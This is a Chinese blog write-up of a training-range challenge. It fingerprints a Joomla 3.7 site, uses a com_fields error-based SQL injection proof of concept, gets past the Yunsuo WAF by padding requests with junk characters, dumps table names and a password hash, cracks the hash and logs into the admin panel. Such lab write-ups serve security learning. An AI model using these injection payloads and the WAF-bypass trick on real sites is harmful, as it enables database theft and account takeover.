尤里的复仇II 回归

最新推荐文章于 2023-01-05 16:31:05 发布
最新推荐文章于 2023-01-05 16:31:05 发布
阅读量1.4k 收藏 6
点赞数 4
分类专栏: 笔记 文章标签: vscode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51830687/article/details/120114114
版权

尤里的复仇II 回归

归来-脚踏实地

在这里插入图片描述
进入页面,首先验证一下是不是cms模板
指纹验证:链接
在线cms指纹识别

在这里插入图片描述
当然也可以使用插件Wappalyzer来识别
在这里插入图片描述
得出此站为JoomlaCMS,去网上查下Joomla漏洞,发现他有很多版本,但不知道是什么版本,那怎么查版本呢,注意cms有文件,文件里面写明了版本号,所以我们只要找到写明cms版本的文件就可以了,但这个文件在哪,文件名我们并不知道,我们怎么找呢,很简单,因为cms模板里面内容可能会改,用cms建站文件名一般不会变,所以说这个文件和文件路径一般不会有太大变化,去官网下载一个Joomla,去看看具有版本号的文件在哪以及他的文件名就可以了
官网是国外的,下载比较慢,于是在码云Gitee下载

https://gitee.com/mirrors/joomla

官网链接:

https://downloads.joomla.org/

在这里插入图片描述

下载到最新版本4.0.2
在这里可以使用VScode打开文件,可以全局检索文件内容
这里使用everything高级搜索
在这里插入图片描述
然后一个一个访问
在这里插入图片描述
http://awd19-b22.aqlab.cn/language/en-GB/langmetadata.xml /administrator/manifests/packages/pkg_en-GB.xml /installation/language/en-GB/langmetadata.xml /api/language/en-GB/langmetadata.xml /administrator/language/en-GB/langmetadata.xml /administrator/components/com_joomlaupdate/joomlaupdate.xml /administrator/manifests/files/joomla.xml /language/en-GB/install.xml /administrator/language/en-GB/install.xml
最终得知他的版本是3.7版本:http://awd19-b22.aqlab.cn/language/en-GB/install.xml
在这里插入图片描述
网上查找3.7版本漏洞不能直接去查找利用,因为你不知道这个漏洞有什么危害
所以我们在本地搭建一个站点去测试
怎么搭建请看我之前的文章,这里就不演示了
在这里插入图片描述
这里不建议用百度搜索,不是很精准,有时候搜不到
漏洞分析
查找poc,复制

 /index.phpoption=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x3e,user()),0)

在这里插入图片描述
你们可以在本地测试一下这个poc发现漏洞
在这里插入图片描述
再转到靶场
在这里插入图片描述
被阻拦了,这款防护软件云锁,怎么绕过呢?
传参方式在URL栏里为get传参(传递内容有限),尝试用post传参,用burp拦截,先在本地测试下是否能进行post传参
在这里插入图片描述
右键变更请求方式
在这里插入图片描述
在这里插入图片描述
还是被拦截了,怎么办?
我们要知道对方负责检测我们的语句是否存在恶意代码,对方是装了一个工具,但是工具运行要占用系统内存,对于这种防护类软件占用系统资源还是比较高的,而对于一台服务器来说资源是很宝贵的,而这些所谓的杀毒软件和防护软件,他们检测的数据越多,消耗的资源也就越大导致网站越来越卡,影响正常用户体验,所以说出于用户体验感的目的,这个服务器的防护软件检测数据的长度或内容是有限的,那只有我们把间谍或特务放后面,他就检测不到了,绕过检测了,所以我们可以给他大量的垃圾字符串,当他检测到一定值时就不检测了,所以就绕过了。
那垃圾字符串放多长呢?
我们不知道,只能一个一个试,一边加一边go
在这里插入图片描述
在这里插入图片描述

大概7000多左右绕过
在这里插入图片描述

在这里插入图片描述
查询表名:

/(0x23,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1)

因为是cms,只需知道表名格式即可,无需查找字段名在这里插入图片描述
在这里插入图片描述
查询到表名格式:#__assets,#__banner_clients…
接下来爆破查询表名
为方便查看
在这里插入图片描述

在这里插入图片描述

看到一个表名为#__user_flag
在这里插入图片描述

再查询字段名,里面有#

(0x23,concat(0x7e,(select column_name from information_schema.columns where table_name='#__user_flag' limit 0,1)),1)

用这个查字段名

(1,concat(0x7e,(select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 64,1) limit 0,1)),1)

在这里插入图片描述
在这里插入图片描述
查具体数据:

(1,concat(0x7e,(select id from #__user_flag limit 0,1)),1)
(1,concat(0x7e,(select passwd from #__user_flag limit 0,1)),1)

WhatsUp
在这里插入图片描述
在这里插入图片描述
68e109f0f40ca72a15e05cc22786f8为MD5加密
解密:
https://www.somd5.com/
HelloWorld
然后访问后台http://awd19-b22.aqlab.cn/admincp利用账号密码成功登陆后台
在这里插入图片描述

来到多媒体文件管理页,可见具普通管理员权限,把默认文件上传地址修改为/

在这里插入图片描述
此时便可看到网站目录下的flag:
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这个flag并不是答案

sparename
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
10 种方法绕过云锁以及tamber
03-16
T00LS 虽说是 10 种方法,但是其中思路是一样的,对云锁的规则进行了测 试后,最终发现了云锁一个致命的弱点,就是如果如果其中包含了注释符 号,那么其后面的内容便不进行 ... - Discuz! Boar...... 虽说是 10 种方法,但是其中思路是一样的,对云锁的规则进行了测试后,最终发现了云锁一个 致命的弱点,就是如果如果其中包含了注释符号,那么其后面的内容便不进行过滤,既然发现了 这个规则那么,我们就可以针对此规则构造正确的语句即可。
尤里复仇II 回归【7题】
feiniaotjx的博客
10-23 2697
尤里复仇II 回归【7题】渗透第一步-信息收集 1渗透第一步-信息收集 2基础环境搭建sqlmap尝鲜题 渗透第一步-信息收集 1 扫目录,但是要从files目录扫,(看了wp才知到) http://oovw8022.ia.aqlab.cn:8022/caidian/files/ 渗透第一步-信息收集 2 这个cms在网上搜了,没有找到,应该是迷惑我们的 看使用说明得知是海熊cms 查询到了cms,就可以在网上找payload了(也可以自己测试),手动无果,再用sqlmap 得到数据库 得表 得字段
【WAF剖析】——sql注入之云锁bypass
Demo不是emo的博客
11-26 7639
前天我们实战了安全狗的WAF,今天先来看看比它难度更高的云锁WAF,你会绕吗?看我带你将它拿下
报错注入 与 绕过sql注入检测机制的一点思路
坚持硬核
01-28 498
相关的sql函数说明: rand() 用于产生一个0到1之间的随机数 floor() 向下取整 floor(rand()) 得到的值永远为0 floor(rand()*2) 得到的值可能为1可能为0 select floor(rand()*2) from 有很多数据的表名 有多少条数据就生成多少个0或者1,并且重复执行这句话,结果无法复现 但是如果给rand()传入一个随机数种子,比如0,反复执行结果是可以复现,生成的是比较固定的伪随机数:011011001110 select co
云锁 mysql权限控制_利用apache特性绕过云锁sql注入防护
weixin_39899776的博客
02-05 205
测试代码:$db_host = 'localhost';$db_user = 'root';$db_pass = 'root';$id = $_REQUEST['sql'];$link = mysql_connect($db_host, $db_user, $db_pass) or die("DB Connect Error:" . mysql_error());mysql_select_db('...
尤里复仇WIN10全屏切换不黑屏补丁
07-29
把补丁放入游戏目录就可以了,网上一直没找到,提取的另外版本弄来的反复测试了很久找到的文件大家给个辛苦积分,红色警戒2尤里复仇V1.001版测试成功,时间2023-7-29
红色警戒尤里复仇魔改
01-16
内容丰富极小极大搜索算法 alpha-beta剪枝算法 课后习题 PPT 提高博弈程序效率 (PS:极大极小值算大应该是深度
易语言红警2尤里复仇修改器源码.rar
12-18
修改金币,建筑秒建,适于新手练习找基址和冷却地址
YuriExtension:命令与征服尤里复仇的修复和扩展
06-10
它是什么? YuriExtension 是命令与征服 Yuri's Revenge 的修复和扩展,旨在在现代 Microsoft Windows 上运行。 目前可用的功能 使用 UDP 代替 IPX 能够在 Windows Vista 及更高版本上播放网络。...
尤里浏览器
02-07
尤里浏览器,自己做的。很烂的 下载下来看看可以,用就算了
bypasswaf:关于安全狗和云锁的自动化绕过脚本
03-20
旁通 为避免非法用途而进行的学习 2.0:增加优化了部分规则现在bypass云锁篡改及bypass安全狗篡改支持所有的注入类型了!更新了bypass安全狗任意文件上传的方法(适用于业务系统存在的任何文件上传碎片但服务器安装了安全狗环境)更新了bypass安全狗SQL注入篡改,现在支持所有类型的注入了 针对最新版云锁和安全狗的sqlmap自动化绕过脚本 包含:绕过安全狗sql注入篡改绕过云锁SQL注入篡改(可0警告绕过云锁)理论上来说规则越多速度也会越慢所以不追求隐蔽性的可以按需求修改规则 针对最新版安全狗的任意文件上传bypass safedog_upload_yichu.txt safedog_upload_huanhang.txt 利用知识点: 安全狗:内联注释博客: : 云锁:引号包裹注释符绕过检测博客: : 云锁:多行注释符嵌入#绕过检测博客: : 文件上传:Conten
国外WAF绕过姿势.pdf
05-09
Web应用程序防火墙(WAF);应用程序 独立于开发人员保护的设计和web应用程序 是为攻击提供特殊保护的系统。此外,应用程序开发人员 他们自己的功能也有问题
sqlmap绕过过滤的 tamper 脚本分类汇总
10-19
sqlmap绕过过滤的 tamper 脚本分类汇总,包括所有的数据库的过来脚本汇总
sqlmap之绕过云锁waf
qq_50854662的博客
01-05 2597
sqlmap之绕过云锁waf
WAF - SQL注入之绕过云锁 靶场实战
weixin_54771278的博客
05-29 2505
实验介绍 云锁是基于操作系统内核加固技术的免费服务器安全管理软件,由国内信息安全厂商椒图科技自主研发,凝结操作系统内核加固领域数十年的经验积累,集合服务器安全、网站安全管理为一体,以操作系统内核加固技术为基础,同时开放网站安全防护、登录防护、流量防护、资源监控、系统优化、安全日志6大功能模块,有效抵御CC、SQL注入、XSS病毒、木马、webshell等黑客攻击,为广大服务器管理员打造高效、可靠、便捷的服务器安全管理方案。 传统的安全防御手段大多基于网络层或者应用层,如防火墙、IDS、杀毒软件等等,..
sql注入绕过宝塔+安全狗+云锁
m0_55563900的博客
04-05 1980
1,判断闭合方式:id=1") --+ 2,判断列数:id=1") order%23%0aby 3–+ 3,获得当前数据库下所有表名 -1") union%23%0aall select 1,database(%23%0a),group_concat(table_name) from %23%0ainformation_schema.tables%23%0awhere%23%0atable_schema=database(%23%0a)–+ 4,获得指定表的所有列名 -1") union%23%0aall
[11期]绕过安全狗、云锁等各大WAF注入,上传深入自动化Bypass攻击
05-03 353
CDN 负载均衡、内容分发 解析漏洞一般在服务层 二进制,溢出,提权在系统层 渗透测试就是以上全部层 协议未正确解析 GET改POST 这叫参数污染 cookie 改一个较大的值 有的waf承受不了这么大的值,参数污染 HTTP参数污染 HPP参数污染 使用多个无...
封神台靶场尤里复仇I第一第二第五第六第七章解题思路(持续更新)
weixin_50549897的博客
01-02 4557
提示:文## 标题章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一 .第一章二.第二章1.引入库2.读入数据一 .第六章总结 提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表。 本文将持续更新。靶场地址https://hack.zkaq.cn/battle 一 .第一章 **sql注入** 首先通过id=2判断是否存在sql注入 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021
记一次无意间的bypass云锁的SQL注入
yggcwhat
05-01 610
记一次无意间的bypass云锁的SQL注入
基于TRIZ创新理论的数据库设计
最新发布
06-07
TRIZ(Theory of Inventive Problem Solving)创新理论是由俄罗斯发明家阿列克谢·尤里耶维奇·杰尔吉耶夫斯基创立的一种通用问题解决方法。它不是直接应用于数据库设计,但可以提供一种系统化的思维方式来改进设计过程。在数据库设计中,虽然TRIZ的核心原理不直接适用,但我们可以借鉴其分析问题、寻找创新解决方案的理念。 例如,如果你遇到数据库设计中的性能瓶颈或复杂性问题,TRIZ中的“标准解”(如40个标准解剖学原则)可以帮助你从不同角度审视问题,比如利用数据冗余降低查询复杂性,或者通过优化数据结构提高查询速度。而“进化法则”和“技术矛盾”可以帮助你思考如何平衡不同需求之间的冲突。 然而,TRIZ更常用于软件工程、产品设计等领域的创新和问题解决,所以在实际应用数据库设计时,可能需要结合领域专家的知识和关系数据库管理系统(RDBMS)的最佳实践,例如规范化、索引设计和SQL优化等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sparename

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值